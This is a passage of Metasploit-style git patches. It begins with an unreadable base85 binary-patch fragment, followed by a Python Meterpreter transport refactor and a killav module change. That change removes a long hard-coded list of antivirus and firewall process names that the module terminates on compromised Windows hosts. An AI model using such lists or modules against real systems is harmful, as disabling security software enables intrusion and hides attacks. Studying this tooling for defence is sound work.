zC2}8;2Z%gK<RKyt6M2-#uZcWP<Ow2A5_yWqZ;3oj<QXErBk~-P7l{0x$V)_CCh`iA
z9wNO&`iS%s*-c~*k=KcQMC2btJ|?o4h(+WRBL5=tDUr{J{F}(<M7|*MC6WIS`HINb
zM80AFWo+!XWZWl>-5ka<IoWO@<5|*pHW{~aJ<XPEm@*bD`-bYBr=+8erdH!9S%;P{
zlNlLfUD=9z;`n*WDzs22?kWUu<k)%2WI*U#Q|2j93+B$L!4Y%Hgn3FHgade%*Wjo*
zHMa(00n#SgcIgc@5D(y;WWQx(*C^>MGv9t2(O3fwUs;hFC4*&;n@4RaCt9OqvXRx*
z$_O@UDrx@8T~CU?MjuCtzs9U2y<cOYFl-bcnxyw@d^4&2ns5rK{mO$1v9WC8T+;eA
zsgksQ<sU^#zkKVel{_{X+PWsPDNCX6i%nf+f+^Xj=E_V=%bBNSDy+a~XKgxEosD7b
zQ@k7IDH#fz(Pk&s-#QPV8#c3}Mw!ZHb<{!+*lgstfE6OY(^(PnIfE4=e|}bie9dH~
z$jU5MhGfoW<;YMWt3W1-SS6BQ%&J<dl@c}wNBIE;u?S4@NDvPsB_u#Rzym4y%47vt
zfiwc`%$3p#jyN&{(hB%dN3WW%sC-^EG>B=urnW2@(33d;=pj*&BXN~H*9P>=wT=w(
z00%RfO5A2rk|cdzN}s*TQW9JsKO6KJxJXqiz~|$^(|95QWunl5LwD~d(MvF8QHlb{
zOwj%U56DP@!P&67NjVq<O~loaL5zcLj6-mj17Ts^%zA?9Qx>JOCa-lRBYw!M=sH4>
zHj1|hhp|f{SIj+m-5CuUG@vv<eEf(8$PxD{yMW4=A#p5zeh&l2C79J4$YS6?0~e6e
zAbO(SEfB?h7H-%{*7kU)s37RZeS{g&9%j~ktUs6$&DcgETMrOyCEJ$u{vh*WfCaP#
zRyh=<^(a6oeSwiIvz)+1CHk+K^=lR!L6)OPA^;@`U>AS{;!vcp0f3B&P@bSrau*^^
z#U>^*aKM?S00xGnv70JHr{7N5d_Fmw1UY#gshkCw!+V*Zzr?H;846&x^%7+aJa@>L
z;f0(Ns7wIQoy=H;`U<mNNzPIaba8nR`RHEBP1lEnP#FD8N|%3$5l7x*4oBV|263Ro
zg82s)%;;T|!N}zs6hL2ZXf%K{!7+W%lY%t62CC9ca+=2@^;-Zrp+s-tK)g^Tp2K^3
zo5lgPg1Ss$sPKt!1$9`3;EL{vj^9L@G4Q0)C3Re=SA^^#hiP#58*=zG98Q33YTWzF
zWZN^ydv3R|z0>5F7We)(IeZrmC&D&8Zu>8?{S3B~VC#+Bo(*PFC~xYC=EF9FZ1a$S
zi^=v<*dnF46Qq<T^oGG*X59Bp<nCv1Hx9NVs4~Cclu=mkWkt$eU{77eh_2>D*Qi8~
z)t&`CPJdpt?uXZjQtb8v>H=stg4pee!~qOm!YN?$?YC7MJ*oBpGB*|6mrubJG4zh}
zpBR{irjVtf#-4%YvuY5Wx8oKSu<imh*XPyX^hMK^?&)ZiFR0LT^rGr0eEYrHiy|j}
z_m@;h#oY|4;x3c}R^GUH1KfQU5YKpYrlhlgxHsXY7eV!fW)lx@uy9eK0%dOC*o_uN
zi@~uQEQyv7cVt<h94X!7*uQSuR}hOW+5f?@e?tvcfo~J+rE{hIn~wb-)!-4)Bcez4
zM30j8VD^>aza=$DMd!us-zNJow0s1r5$ZcC+F6zgIkJDG&II;eS^ghT$upwIK_3vb
z3^}E;$NHPvZ~Z-9CLblr<R3%J#D4}jd;9MrPGzVI>i3^9B~)j9I*|Q;JIVWeNcO*Q
z?7tk6{r@=jUk%CT*N*)+L$diT*+UUS0GZrJnarlqGm1Q(4K`lM@jJ;DzJ5Mb?py>e
zQD_^iMq)34abji`OqXiG1;K^Eh0%r4`b7%?Ed`nkoV|IdyvsG{{F`W9L63avN_tEJ
zb1xnftZSqO9BSy)!J)zkV>QA=Y}68d0cPYyV0*unT#bYxL)V?u@OP23yWp${Ed3B2
za1R-y#hWruhoAfG7wdi~xQaKGV~{WK-pVR|(6*ONh3p@4>>t(!nhM!J;@Cf`4Kx+9
zf6TE5vo4g4*-eG)!IO*d7jMeUM<SlKU;KqV(Io-;`ix_74#v8r(&jmhbZzt$o~TTJ
zZF=F1RyNLLRu7y_%$$G_UL_Au<5ghojyq&Y4*w)SQ`!7E{+TCz{)=7m?`sRxE7`N`
zWwvbj2h3t$;JKAw1m(lamMf#Ej!!~y{*8+BBNX*Y1oyE_0oCX~4^X2Pg*zTPi13(V
z{mZUcC?cYY{mib|f7=!NIaOIM>7Im4cf<M`aqMMf%Ga9IKZF5~#*}Z-nz}L1#0Q!Y
zWO=5(z&cCs39eeSN<my_<NNsDP_DIAm*dts^vJii(PNTzt}dI=c0JMhR>xc4`2%)y
z;&vAd*sY1%{lr$c10ngeT)0$6VO*y7On)tU?325D`$ET>92Il9RJcQ$eTv}d8gg`<
z?dYiiN7o~%$6~morh9|l6F3g#d81Up0}*Skoz!%1gU`I~g%B%%oy~1JR1+mKdJkn(
zwjsj3ZbOctcPQRO_Bc&MwH_j8(cCL&DkC;*_K0phq6ZgRkAk509p4*0p*MQsqJ=7=
zu^!Wbk_??>{aQYK*5i5~_@zT9TTh@Q`eZMC66O6{1d7IMw^tfKpLQ(l_DVL-*fw|u
zgVA7gt@S%tteZ;8T+8(W>jk`xml}@H6QlpHwrhco<0{X4cOG}2dTaHtWl6SPmdDaQ
zM!Q-$4=K`)ti+atB*zJ$U1V$5qga-V9x*8eOi75_@NyFh0ZJ$Vhwv&noSycao>SVA
z_CQO);n8vk6b_`Pg+R6Dq!h@Zr{8~PW*@ffV7m?6tM#2bckayG`_H}q|NZ|*9IOB2
z^q%z=dk>Z)dV60lzK6p5`i3&@Zt0ItO+OFnh?g)@T`j~qHHD}4Z9Fyc#J&wwHg5Sl
zO8z@^%g<Z4JXChe-&Mfv`WoEx_vlB*LP!2z3-|hcdK<f_*`sLo1*h2;tY-g10hJP(
z{qc6q{zUmYJ)@{-`bFm-)cj8i&Hs#=Z>8qv(frSy=6`NA{|hDm65W1l{ugwW|F*7D
z{=R-`zpr1}@9Woe53j@fdbx0s|DlVt(VA!nF7h_PhI4_r-lpasQW0aKYvEY_?JBCY
z(`a2rl}AJsjJHRyp2gF9RL#Fz6|?6&D2l|8i;Cy;sA@}anj18F9#c#1`Mu6R=$_vP
zmM0PykE_lw`T$*XH(hfb*L(ukER6FfaNSQb_B04mt?Pcg{JLOl5{-RIeU66k=LO}+
zr_q_`K(mN`2(pdOI-R@6?%d}JmwtvWy$9%48DC`l?4Y${HG1(?^df&zrKRF?RHw7J
zsO%!T#fM2WofpoBeXjF@o(EOm3knzWB<OfVZ*p@NbIXNc{(id<D~e*_<96YZ(!vke
zh4+*ee$XzQC@uUDN7uTY#ophbJNYkSS8)mxyoX+M6FLcs9LxYHJHE_8i-Z21%72AU
z+e@cap~AQ5w12^ACv(#{vDYalch3BeM0pd+_c`T1qw+0LejMeRQ~oO|e_52*qkO+p
z{t)~s^ACf-<z#LV<$X^1c`AQYl;=?1PaWQg{yc$l68KMeh%6>|@;SrAir}LZhAOOp
z<mR0u4WB|Kj1uy-h`64Dljba=e9lez5$P!pam3_K8YeK)z!H;NvA6_2CkmHP_>2eR
zcm;GY;=XGTl@Tm3g--#E6cTY&A4K_IiaN(@&f+&%VCX(-PUH9A7V8&8(X--seGPP9
zG-Kp1dGcTO*mHxvCDi5oKY&z+n#n@c{A1yFM;=r$<Hr;sT0s!wEQ*}ZO%)cs`EOGD
z@I*N#8zVBl@bpw7ZoJ7ZJe23@iGB|?Rs?av_o=RNA8z&s9(?Oo@;{{7QTljqp!UC0
z?H`Lev>JGkeu?h@4O_9$_-Ubt2CXRiS)quAtSI`=LJ<vEQM6SkqTwov@^tN(^NwE@
z?-+vRWl#P$xYg&xO$#y>9Y8;*Oa<C}&;0Al$Qx+y^$?q1vkD9RFGS|z$DyCI`Sr^V
z5j70W=f6_tH;PS3E#@o=-^%AVFRL#LUKln1CiM0TbuVF60W}}d!ej*s)V9Y6^I!p2
zI9No9+K?u3{3bDlmYvyUneIIfx}pF*wan%g1WU0D>B974BMxjJLF#&OiPmi%unZgG
zHee!`Hvlqu1&enH0;g!-RxP6k&scxk3uxNX=T!PkZOowql9$P2uLR>*22b2rScAoj
zJSMG9m$hkKkW6C!l6&zMDidwYHm3myv63xAds#4<SHuFs44VW+0PHRCa7>pIi9{Sm
zUJ+g#e-KiffXfIh9v>jE#R?3%(FC|>U`;AQXlxMVHH|f7_SIt&49gxe#ej3BB?R+J
zBS6B4uS>3i3Zn3m!=MzPFuYQTGeD1<$x%?+Nt81Z;_f2oE+EM@T&m?#9hd4U2CoW}
zN`$L1LMTf*H2z?mad~|{zuy~ZI;Z;ZA2}rx%D9>^#-RpRpbh&yY+6t?(8aoYkoF?=
zBJD%ckoF_>A@w7Lk)i{vJC45zR?*;vYF6gM6wOuj47&nQ-`3p$1)(Rj00glYm|=uX
zC8Z;DeQ*oJSK5$ZAOfh_kiAgaNQ$9&p?#56L-mpx1?)DYf^_@*<Vvlm2kArNc2!$?
z#w}DBOS?60!hgu)&ZZ^JYhvr|lO6)ctL8W1dlrB(C9P;d6W^5z<x3#o(<)8+{-cK~
zpSx6*e+iOli&eW`g5s+Ni%q!sxhb!cD6f|(4=I#4s4p>`@GC}KYve#Sp}-mI;xX0a
z@WlcXtO?mix<oes-h2<LK1mv&k3$0lHgZTF{5_bz;GPfWg7bk~fGF7DFs|}2szOT@
zM!>%L3d$;TmGf1(D$*6gABk9$=WBDd7jyU)*WFn`swb#xnbHlJT9w}kvd^YmQ+U2U
zS0A2l$Tf%zzC4h86*z8r^ZW!#uX4#ZlU-lkTsxi>LZKl0dK-!psjS9LO1}c?%;j-_
zC6++Enmio8K}lEE>6?*tomY7f{bg6!PQV4rY7}J@@n6|8s;ox;jZ3LScmPr=2`L4M
zBo7Y6qLw%UG)0eIzchlucpxGrBRV{Ig)nLiHIpck>&itDB#k9zEL*M!5H3~PuFMJ~
z6T*IXdK(~kx-jll`XA>Wk6L?9DaxH7IRw<WD#<9Rx;#5s%Pyo=q&B2>q}@mz-K?bt
zfA=zPwO54)gffiUOs-lWksu5i7D1K)#|cZOsJ2W|Nv4q1h-8S$Wg$btmJBK3$10H_
zi$xjope;j$tl%m)E(P*W3t16#Jq>A4!6>hEQ(h%eUM*8zqdd(}6;_0zlz=lVq=b@x
zMo0%ZP4NAw@*G-&ZhYQL8G?dP$X}8R`EMdbGDJj0uHs@&xzkH@qZBGa%=bWk7qqC5
z24RvCVG<D{v*x=O&06z4P@L~J+<v`(_JMUoLa>o?HW*(_e7t}b`tCY4hqkL3+E_h(
z2*Y=|?BKd9bZm8X1AhMtV32aKs6fG1uA8f84zF&mXGb^Jz_HSG+=Tl-*prCAD7%tf
zTc22&+Ay<g<;`^x%ynVoxQUuVGR>`SQ%j)MeSqhJlLYY=)~BymSU7ijpzP}QGlA3)
zK3A5T!uqyPW7~&m#h<wL+9DpYMTQg~NI2^vDG>=v0E<b3(S*HfkO?7%P$iMDzvRu-
zZP(xOa3uqPb}8^q4k7da3~7R`4n9k6ge|G!ZiTyR5D<Vun7BRM9pd;BOU>S93Sxr)
zyI>~4UwnltDv_#@YLV)Y>X90d8h4PLbten>yfS@KI0AmV@k1JR<KIjfmS~ppVHtlU
z&oG$QnCu-!aAv0XhdKVJ=$4?Y;~oi9Qj#@mN`}%1xV(TVB(p|*+uhBGaxB3<jYST=
z?@A})0jL^HN7}mE^l-j>#QNY`{;a-y9q8doqwEAO`Rp0-I235*UqFIh7QcSD@n;wX
zRk1~M;pk0%`J|CCm`s7ttHzIvF*SN*HgkAn61-6}l_)h<k8grCa%JH}cCBt?div1B
z=*S%LwTw<3o<5YCOVyTm1&rF5O#dB6=H^gmZ0hKw@7U(X2009zS*f~XWc04gU8#FP
zQI(pVO^sC$P1;@A2d3BH+?HMRjUEI8OezDKDvAMuXdJ1P#eiK13aXhozg0YowfKfd
z9GI9Krzjy}>Q;}=q{=&2bsT6iLR&jMYZ{%J1P#_)=8CEfHe!ABvNM9fh0jjSWR6Ua
zf$Ay%bUdWRk<$R<W&J1_$yojK5jt;FbXr0CsTl>h!0eh|{LUCNBZpJ9Ip>9@=#W9u
z!9FhdwS3|X+}lRhm%3+SE+b04**7e0h{8Gn)jc{fiN~4&Qde+q)lj2HmsS>6&x{=3
zSh^o4hf3>>rJR~|#hPPTK=?#m`QXG@N;a1e=VW5+P)c4}T+RjwqhENx0fO*4kIy>f
zY!1aCXG`IuvnECkO}skg6OK268;eg&-i@*`I3V1Qf<;d7bi6Z8pg_pbs>7+tBV|JZ
z#4ek~ArUxyWDb;N)-(2>+JrBd^^hATNA8{&9|2t1dQ2I+;rf+@`<G5EY^<({XGSs~
zmkC{7dlqL;j@Ok}p2evvC+a6tM{&W4Lt~ke@m{-<Ju_-9EiaA~onV3(#>Kl1f>^J3
z;}tkYT}sVh7EGq-puj<{jbS&|RC;jK8XW*#kBr?LDyer|jF1^}WGUT!!}|g>ZZnmI
z(KLe)M%gvtlyP?o@m~m7i+@dHF4)mveAd6j#IoYU(8RI}t%+q7i-}b=n>v)j@S;gB
zCS>J0d|WYLFpb0jmuC-79hK<=S}%sEU9B)=YS(EDTXmh0W0TNX4Q3{2hRht9#=8xb
zRGy%Dv9@^{Z@Fr2W@K{Kn3_54bfUn`Wi@P7z>q^X#Vu5d3QN>YaT^t)1*-y{Sg?2)
zH(zN@=R%h&HpPr~dh5pu!M^U851>)&l8cHM%LEf&S`6U#krXv>7#=Ms+RWnYQ<y8)
z`?0qK`T@g{4%gTflq}H;)%y#-E?ew-3kQm8e4-S+`~z|m>w7>s<ycZ5kOyJ_qQ?_D
zkmp2>1|K#6xWho9L-7zLI-yvcu;Bw?9js@7kfS6q2rOwN8A$*+o=hfy_{3o#L1O}4
zs>ccZ9gigmX_|;52a#GFBt!$irN?4=7=%PRK<-K`9>K06mKcael-OVr<$5@ZntCLG
zKIpMXjB;RE6&<}rxt<tEA|HgZgpjDZqJzr_zXu27040Xe3k6tL0Kx~NNiem+8yrMP
z1Bk7J-+;d&2Sz=j#8ES;#3KnHW#gzapu_>J9aIpQDG^oTppDa&_+SzUT1x>#pxN+m
zrE-Y_mmiT5vBEBAEwmwaIk%PXax8@lV6E16CnTJ{p?N`kCa7K7xU`!~AU6WD5jc%N
zXoPT0eOwBQuuM9a;#?Z!(h!$!;nHnf8s^d+TpHt&!KH&-y3>i_G>sTeT$<z3-CVkd
zORwhAYq^x>((AZ%j7y7L%5ll$(khn(Kvg=)rDZOG-Ds0bpJLwEW0Un6ibSVk-KGx=
ztekVx7VG5lDc8_C)-<Xsem^_&2BZg&eh2A|NWY8pCZsnby#?tkL-tn6evh)ZQT8BZ
z4^j4Z${wcd9A&>x*&k5$2xae}?46Xoi?Vl9_8!X4Q}&0HJxbYQl)aa-Kceh?l)ay_
z$0_>&Wgn#MLzMk7Wgn*O3Ccb~*`HAMQOcgA>|>ODoU#j)Jw@3kD0`Z+Pg3@2_F2Zx
z{3-qX9Aohz+CZ`cv~!FB24^tc)<)^}&QZ5_j=HUl(rs;&PTDALa2<dh)nj<{TE@87
z@apvpL9Gm*-T-Q5zv0)L81n^;fW8B6^Fbr1w=fo{Fe>y`un|=nm3lk)kE)C+9VV*E
zYNJ|*8LFzrsL^5bsjf9@br^AK>Wn&lA7i!kM!gQBOI^qa>HUn=Hy90igt1Vg(Wu7|
zc&o{1(gzr8Y&M$p1Y=D*j2(KCvF4q|PW=D_ue8yk-wF`sE@PK|JHyV}Xw^p;+tp^Y
z>7$Ibwj1qwim|rc#%_I_vGzU29({tb-5o}UeivhVI*m^KFk>BEMwdRtSZBA<t-p#P
z+<?)e&oZb6jlKF2#(H{<Ui~Ozd-oap^m`fW)eKF44P*QE8~gQn#<V`8PtP#6zu)NB
z7Z~dc8)5x8WBm~$qGuTkM~$d{g0V=<i0MlVk%J@_ryV<_9$u8J0Kp*Cem1<2)P5sH
zwO^*VWq)H)>-WAAt>5QutsnO3D!5L#R&8?Z)A@@m?a^vY*q7=&54+P|t=>e0q>%SX
zciN{ln4lAB^nJmd_G?Wh!WuREzw1s1v>j$(i|q{j(wz=!EoKlAxPp&K=?bmYtk`00
z6&Iv*rPgj%Zn52!e<!7@v^{1OqUKh;Af>CdPO}<uu&UoKr)#usvu2C+)O<ot*J^vs
z+AY>w`>dR<)ApHl0N~aAKu*_d`^|bl^6KBCq(fT28QNmu(C3wOgBCFx5MZg{Yf8FN
zi<#If>5VTc=_YN!Y}#UR=yuc1TEfKkX|VZYYI=v3G<R&Vp&fs%rgv%wOzfy`+4)^H
z-J;!Uwjdx=%P-aRF70*`o2=nozfsez+KAb@#qMZ*oTuBgQL}A}jkSH4r`xrZ*$$4F
z_9uCIw>EC>1~1I+XL)*$Hev1o7tEf2=IIXYF0*5c9qRZmp6=8Ro7l5WcAod7yR<2@
z3-l~qpYf!-wO5(lpl9j+vM1f6&6+*1^7Z_iC%soYV(tZ4ZSPyX>0a$9anRh;`w?$?
zpLQ>C(7bxz7rbdrdkt~WyjFYOo8GU@69-Lt|F6C2J}pBWG_UJ>+?Vdx7R>%FcC7y|
zeCe=u+{D;f41dd)j%Zmkvc+<dOTKheJ7I#b%8b6tpN?ruW{kF#GSFN-m+s4709DQw
zJL$TBx4z6MKjpsQ$APE)q|=#@@}Kn6rW4fbuy5X%|1;Fj|G9rYKA*@X<_B|wgdVyx
zPE6*cwvpSRroAuUJb%mlt+`vn^Fz5Ik&(v6jN^!<u=x=$Y)>f|Q2&*|fE-oLxa-dA
zT>(*x2d-=p3!y2jSLo=_l}9Pc&{Yl%3BOy*gBg09$?Tb#*+U|*tE17dT>bt}TZcJJ
zcmp53dcR(=%M&Z>a1UO~ZrAnymv+(V@f+)}vr$=e9&KqviIPAQK5N@U?qky0`f}>V
zt_DrSw7r9(3zqww`)HSEd71k&nUUF8CewF+_PBaCHZ7}bP8bl5^Tx1A=Zhkm#QMk$
z_Jm@GTJLA#CR!+e)9%~~2W{{A$l3`H%#0$|C%jTOHrH0xM{n#Z;HF-lfZhXJsyA#D
z*yrs9sHF)k(NNxUgBKxXNj3<pX?6{6fmtG9zQOSX(<y}z5p>`}Wn=GVhHk89OBiqR
z5*j>oW9P34u5ApevOZDZm#fH}Z6qQEyuC{8`fVlDwN$e*JY;nlw5)oIIJbNN6{VaU
zg*ToY#pbA>a}ZNh#vUj_8okna1UJ0FxWA+?h(Qud)^2kFSa6czVA-IO<Ac$#Dl}|a
zgqlqzs;_v5*bNRug*IG<)g~I+{;9$nITGC_N{<9@KrW(PRfTFob)H^WRGREaS5O(l
zrYzTj?6pOK#e(hPtd+Ai&N{iePXxJ&adm*J39cr&dVs69a`kquj#wP7h$#!qH}tJg
zEJNQ*0k0VRSlrBuU!co$LmypvHdx_uH$3QaH$Eu4JYFAbImi6|rsf?xUEbXfVny9?
zc8|;3h01<!&)GfQ06Aet!(0^_+uw)Oj}$?QBI!tRq(P)1q+5_~LmEc918EG&U=8s0
zsR$yL6}i5M=vIhmh3HnnQCN~B#I=IWxpIV}TUC)ul8U%ih;9XdGoo7|u9c5@5!VXQ
zt?ET|s}M1fB1S2zWDQucvLJ=GvSNEz;>&Nx_HLbTr0`Y^_J{t9^iXgcz@S*5hV^o%
z;L8j%!Bz}%yJC5O9lPQc;gnoc*SkEho3~LS<pv_G5lW-iS>TKED%<wo7KGQDangVu
zEdhgU8!SpfFgeSd;S=Tz*e~2<zmWVu4A?dc@@9l3fin+K1)czt+?Hj6k!2zPMme&B
z(EGs&WN!#s`-!?VYg-_TT&Y1p&Nrb17JSQ~Am?l5Wg=A#Q$_(YrAxB?B1elRHcR6J
z%diM@;4IYItMTe=WsrU7CT$77Wn2kYI|RkF2wp=fD(juu4*7ORMy_{^*h)0}^lPZl
ztd(Dh9?U+)c{-OV(d=>J6H1&EfwG(+8bzgA874tI;u}|~MPj;6qB?FH%42ZIz9vFP
zhF5nK20HLlTQ>39P`%I=3CkM6b1XfPFn`NX6~Ukew2q$~ou!@L8cR1LyJSUCgXbht
z&IAHpkZrsCz}7=Qqc*U{CZuMh9Y`&^SYs>xwlVG(7H>&dyxjrPThItLD1;t!0YxK|
z-U9n&PWxr>)rtLb(-qt0UTeEdL!Eljcgd3<r%GPeIN&l2ncs~pAdTb5UG^sDFgXQD
z`AM1%2!^a`IChH8s&=jBSLZpBC+86kc`&%;PhZSIrzM}|-^#C9fvWATj|W?yAcYPN
zlYv`gV(Y`vp0)LPM={bYea-vrb)++mhAW-VytBZ(J2f*4wREq!v2hx~m(H9y)3>m=
zdMt~@z^Q&{0ptBS40~(_`o+R&WntN`_r?3debHDn9C6)#y<?wxb-=zjM!t$=HuTrQ
z)2oQq^?<RooW;M?#ibL7`s6VY^oe3Pd6w2^mrkr?7X$Za*Oqb*jETbyCB{5!jXNh$
zZ#-kQS&=DglxM6~y&0!jZ^mgim?>?zF>{rc%cG`N*vLIw7|_HL3n=^MoJW7z9OaAI
z+`{Ja#=gs|U*(zv(<`jaoTjZip+m$SP<B=4=C(cP+%Fv@z+u^$)|bn^8>-=KMz&e)
zyu!)O_VS8qWp9M8amB4!?~V=;ilVH8rSFI;T>E>7z%j9KEP)WJB&6cWB$WSg;1DBN
zaYCm*DC=YaKrB@e%MQPwf|n5#B97H#44EF$<v1Z1<4Kf3W+D2+KyuL8nf*4}aTyi^
z9oPi;YLd89LTy6WHPLsMRd80xSrr99g#wM$awcFv%u<avak-tKKj1Ye2tmRwauSj9
z0Vu+~2WYvZ0Ep<ve}RC%;T(73oRVN{Mo0n@jX{@x2e1eTdg@1%?EoU423rwHG`Rb0
zz02Q$(oU3iL3%2#x^C997pWI%ACiW&AE^(iA1RC!L5d>9kf3Vq89<67C6ES@l1M|h
zvYy-U_jVR)@M5uA4FsbfO9MnXg=@4d{vjdQsRR)!{-IP;L{wF^fQ}%S#PjkEyMiv}
z^-_FPpLY~1NI!%(nhDfWnAD(K{G$S>NG~3wII{}A+djxt2C?oZvCcqrPvX3$HbC-T
zwwd8eovS^vvIMwulB6+rC5bHonb(cXCn598$N~zopqfO*5psJNg{y!&KX&o!5bCLm
z-!SF8K@wiUr{I`ks`-N!l5xTUGTsR?R<G&HA0qKjfQtayF`?+Xk5G(QZ&6tgWp75=
zS-7&vC`9*Vg)rU1(;D8@IgoZ+uGm!iDFQrw2Bm~(5~S2r`Ye_HJxYBj#VC`NMwEU9
zrGQ_$zQXcf1(XUs`5G<NL@;wY>xXpK3pk6^Y|z?U*9A5cE(<870QEkn^gLlJ9|a7P
qkdq+sabll006AHLmo!6Ym%d1WT3VljgJpSjX~Q*)-~S6daAat>m)m9l


From 831cb904a93a1568b8a99c6ae6e5bbce40131d62 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Wed, 15 Jul 2015 19:45:34 -0400
Subject: [PATCH 0796/1013] Pymet fix the new transport position

---
 data/meterpreter/meterpreter.py | 9 ++++++---
 1 file changed, 6 insertions(+), 3 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index c8c37c00d3..fd079e4835 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -715,6 +715,10 @@ class PythonMeterpreter(object):
 			return False
 		return time.time() > self.session_expiry_end
 
+	def transport_add(self, new_transport):
+		new_position = self.transports.index(self.transport)
+		self.transports.insert(new_position, new_transport)
+
 	def transport_change(self, new_transport=None):
 		if new_transport is None:
 			new_transport = self.transport_next()
@@ -876,13 +880,12 @@ class PythonMeterpreter(object):
 
 	def _core_transport_add(self, request, response):
 		new_transport = Transport.from_request(request)
-		new_position = self.transports.index(self.transport) + 1
-		self.transports.insert(new_position, new_transport)
+		self.transport_add(new_transport)
 		return ERROR_SUCCESS, response
 
 	def _core_transport_change(self, request, response):
 		new_transport = Transport.from_request(request)
-		self.transports.append(new_transport)
+		self.transport_add(new_transport)
 		self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
 		self.transport_change(new_transport)
 		return None

From c762e9e8d698faa0a8779f6be4fc7bd9cd857fbb Mon Sep 17 00:00:00 2001
From: Marc-Andre Meloche <marcandremeloche@gmail.com>
Date: Wed, 15 Jul 2015 20:02:18 -0400
Subject: [PATCH 0797/1013] Fixed as requested.

I added the possibility to read from file, instead of modifying the module each time.
---
 modules/post/windows/manage/killav.rb | 624 +-------------------------
 1 file changed, 3 insertions(+), 621 deletions(-)

diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb
index 1ac28e83ee..96b6e894dc 100644
--- a/modules/post/windows/manage/killav.rb
+++ b/modules/post/windows/manage/killav.rb
@@ -21,627 +21,9 @@ class Metasploit3 < Msf::Post
     ))
   end
 
-
   def run
-avs = %W{
-  firesvc.exe
-  firetray.exe
-  hipsvc.exe
-  mfevtps.exe
-  mcafeefire.exe
-  scan32.exe
-  shstat.exe
-  tbmon.exe
-  vstskmgr.exe
-  engineserver.exe
-  mfevtps.exe
-  mfeann.exe
-  mcscript.exe
-  updaterui.exe
-  udaterui.exe
-  naprdmgr.exe
-  frameworkservice.exe
-  cleanup.exe
-  cmdagent.exe
-  frminst.exe
-  mcscript_inuse.exe
-  mctray.exe
-  mcshield.exe
-  AAWTray.exe
-  Ad-Aware.exe
-  MSASCui.exe
-  _avp32.exe
-  _avpcc.exe
-  _avpm.exe
-  aAvgApi.exe
-  ackwin32.exe
-  adaware.exe
-  advxdwin.exe
-  agentsvr.exe
-  agentw.exe
-  alertsvc.exe
-  alevir.exe
-  alogserv.exe
-  amon9x.exe
-  anti-trojan.exe
-  antivirus.exe
-  ants.exe
-  apimonitor.exe
-  aplica32.exe
-  apvxdwin.exe
-  arr.exe
-  atcon.exe
-  atguard.exe
-  atro55en.exe
-  atupdater.exe
-  atwatch.exe
-  au.exe
-  aupdate.exe
-  auto-protect.nav80try.exe
-  autodown.exe
-  autotrace.exe
-  autoupdate.exe
-  avconsol.exe
-  ave32.exe
-  avgcc32.exe
-  avgctrl.exe
-  avgemc.exe
-  avgnt.exe
-  avgrsx.exe
-  avgserv.exe
-  avgserv9.exe
-  avguard.exe
-  avgw.exe
-  avkpop.exe
-  avkserv.exe
-  avkservice.exe
-  avkwctl9.exe
-  avltmain.exe
-  avnt.exe
-  avp.exe
-  avp.exe
-  avp32.exe
-  avpcc.exe
-  avpdos32.exe
-  avpm.exe
-  avptc32.exe
-  avpupd.exe
-  avsched32.exe
-  avsynmgr.exe
-  avwin.exe
-  avwin95.exe
-  avwinnt.exe
-  avwupd.exe
-  avwupd32.exe
-  avwupsrv.exe
-  avxmonitor9x.exe
-  avxmonitornt.exe
-  avxquar.exe
-  backweb.exe
-  bargains.exe
-  bd_professional.exe
-  beagle.exe
-  belt.exe
-  bidef.exe
-  bidserver.exe
-  bipcp.exe
-  bipcpevalsetup.exe
-  bisp.exe
-  blackd.exe
-  blackice.exe
-  blink.exe
-  blss.exe
-  bootconf.exe
-  bootwarn.exe
-  borg2.exe
-  bpc.exe
-  brasil.exe
-  bs120.exe
-  bundle.exe
-  bvt.exe
-  ccapp.exe
-  ccevtmgr.exe
-  ccpxysvc.exe
-  cdp.exe
-  cfd.exe
-  cfgwiz.exe
-  cfiadmin.exe
-  cfiaudit.exe
-  cfinet.exe
-  cfinet32.exe
-  claw95.exe
-  claw95cf.exe
-  clean.exe
-  cleaner.exe
-  cleaner3.exe
-  cleanpc.exe
-  click.exe
-  cmesys.exe
-  cmgrdian.exe
-  cmon016.exe
-  connectionmonitor.exe
-  cpd.exe
-  cpf9x206.exe
-  cpfnt206.exe
-  ctrl.exe
-  cv.exe
-  cwnb181.exe
-  cwntdwmo.exe
-  datemanager.exe
-  dcomx.exe
-  defalert.exe
-  defscangui.exe
-  defwatch.exe
-  deputy.exe
-  divx.exe
-  dllcache.exe
-  dllreg.exe
-  doors.exe
-  dpf.exe
-  dpfsetup.exe
-  dpps2.exe
-  drwatson.exe
-  drweb32.exe
-  drwebupw.exe
-  dssagent.exe
-  dvp95.exe
-  dvp95_0.exe
-  ecengine.exe
-  efpeadm.exe
-  emsw.exe
-  ent.exe
-  esafe.exe
-  escanhnt.exe
-  escanv95.exe
-  espwatch.exe
-  ethereal.exe
-  etrustcipe.exe
-  evpn.exe
-  exantivirus-cnet.exe
-  exe.avxw.exe
-  expert.exe
-  explore.exe
-  f-agnt95.exe
-  f-prot.exe
-  f-prot95.exe
-  f-stopw.exe
-  fameh32.exe
-  fast.exe
-  fch32.exe
-  fih32.exe
-  findviru.exe
-  firewall.exe
-  fnrb32.exe
-  fp-win.exe
-  fp-win_trial.exe
-  fprot.exe
-  frw.exe
-  fsaa.exe
-  fsav.exe
-  fsav32.exe
-  fsav530stbyb.exe
-  fsav530wtbyb.exe
-  fsav95.exe
-  fsgk32.exe
-  fsm32.exe
-  fsma32.exe
-  fsmb32.exe
-  gator.exe
-  gbmenu.exe
-  gbpoll.exe
-  generics.exe
-  gmt.exe
-  guard.exe
-  guarddog.exe
-  hacktracersetup.exe
-  hbinst.exe
-  hbsrv.exe
-  hotactio.exe
-  hotpatch.exe
-  htlog.exe
-  htpatch.exe
-  hwpe.exe
-  hxdl.exe
-  hxiul.exe
-  iamapp.exe
-  iamserv.exe
-  iamstats.exe
-  ibmasn.exe
-  ibmavsp.exe
-  icload95.exe
-  icloadnt.exe
-  icmon.exe
-  icsupp95.exe
-  icsuppnt.exe
-  idle.exe
-  iedll.exe
-  iedriver.exe
-  iexplorer.exe
-  iface.exe
-  ifw2000.exe
-  inetlnfo.exe
-  infus.exe
-  infwin.exe
-  init.exe
-  intdel.exe
-  intren.exe
-  iomon98.exe
-  istsvc.exe
-  jammer.exe
-  jdbgmrg.exe
